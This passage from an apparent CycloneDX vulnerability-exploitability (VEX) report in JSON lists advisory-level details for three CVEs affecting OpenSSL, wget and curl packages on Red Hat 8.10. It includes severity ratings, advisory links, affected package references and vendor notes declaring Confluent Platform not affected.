          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ]
    },
    {
      "id": "CVE-2024-0727",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL\nto crash leading to a potential Denial of Service attack\n\nImpact summary: Applications loading files in the PKCS12 format from untrusted\nsources might terminate abruptly.\n\nA file in PKCS12 format can contain certificates and keys and may come from an\nuntrusted source. The PKCS12 specification allows certain fields to be NULL, but\nOpenSSL does not correctly check for this case. This can lead to a NULL pointer\ndereference that results in OpenSSL crashing. If an application processes PKCS12\nfiles from an untrusted source using the OpenSSL APIs then that application will\nbe vulnerable to this issue.\n\nOpenSSL APIs that are vulnerable to this are: PKCS12_parse(),\nPKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()\nand PKCS12_newpass().\n\nWe have also fixed a similar issue in SMIME_write_PKCS7(). However since this\nfunction is related to writing data we do not consider it security significant.\n\nThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-0727"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/03/11/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:9088"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-0727"
        },
        {
          "url": "https://bugzilla.redhat.com/2257571"
        },
        {
          "url": "https://bugzilla.redhat.com/2258502"
        },
        {
          "url": "https://bugzilla.redhat.com/2259944"
        },
        {
          "url": "https://bugzilla.redhat.com/2284243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257571"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258502"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259944"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2284243"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-277137.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-331112.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-769027.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-915275.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6129"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0727"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1298"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-9088.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:9088"
        },
        {
          "url": "https://github.com/advisories/GHSA-9v9h-cgj8-h64p"
        },
        {
          "url": "https://github.com/alexcrichton/openssl-src-rs/commit/add20f73b6b42be7451af2e1044d4e0e778992b2"
        },
        {
          "url": "https://github.com/github/advisory-database/pull/3472"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/09df4395b5071217b76dc7d3d2e630eb8c5a79c2"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/775acfdbd0c6af9ac855f34969cdab0c0c90844a"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c"
        },
        {
          "url": "https://github.com/openssl/openssl/pull/23362"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/3519591d255d4506fbcd0d04037d45271903c64d"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/03b3941d60c4bce58fab69a0c22377ab439bc0e8"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/aebaa5883e31122b404e450732dc833dc9dee539"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-0727.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-9088.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00033.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/11/msg00000.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0727"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240208-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240208-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6622-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6632-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6709-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-0727"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20240125.txt"
        }
      ],
      "published": "2024-01-26T09:15:07+00:00",
      "updated": "2026-06-17T06:54:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any Python code. That assures that the vulnerable code path in the affected library is not reachable. The Python libraries are only used for diagnostics."
      }
    },
    {
      "id": "CVE-2024-10524",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        918
      ],
      "description": "Applications that use Wget to access a remote resource using shorthand URLs and pass arbitrary user credentials in the URL are vulnerable. In these cases attackers can enter crafted credentials which will cause Wget to access an arbitrary host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-10524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/11/18/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-10524"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/wget.git/commit/?id=c419542d956a2607bbce5df64b9d378a8588d778"
        },
        {
          "url": "https://github.com/advisories/GHSA-mqrm-h2pw-9j9r"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10524"
        },
        {
          "url": "https://seclists.org/oss-sec/2024/q4/107"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-10524"
        }
      ],
      "published": "2024-11-19T15:15:06+00:00",
      "updated": "2026-06-17T06:55:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-11053",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, curl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.\n\nThis flaw only manifests itself if the netrc file has an entry that matches\nthe redirect target hostname but the entry either omits just the password or\nomits both login and password.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-11053"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/12/11/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-11053"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
